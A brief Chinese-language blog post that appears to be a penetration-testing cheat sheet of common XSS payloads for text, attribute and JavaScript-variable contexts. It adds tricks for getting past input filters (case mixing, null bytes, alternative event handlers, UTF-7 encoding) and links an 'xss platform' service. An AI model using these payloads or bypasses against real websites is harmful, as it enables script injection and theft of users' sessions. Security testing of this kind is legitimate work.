常见xss脚本

Posted Jan 13, 2019

1 min read

常见xss脚本

  
<script>alert(/xss/)</script>   （针对文本元素）
"><script>alert(/xss/)</script><!- （针对属性元素）
"onmouseover="alert(/xss/)"a=" （针对属性元素）
"}alert(/xss/);function(){// （针对javascript变量）

绕过xss过滤：

alert被过滤，修改为prompt
script被过滤，可以进行大小写变形，加上%00干扰字符，如ScRiPt、<sc
onmouseover: onmouseout、onkeypress等事件
对<进行过滤可换成特殊编码，如UTF-7

xss平台

https://xss.fbisb.com/

Security

This post is licensed under CC BY 4.0 by the author.

常见xss脚本

xss平台

Trending Tags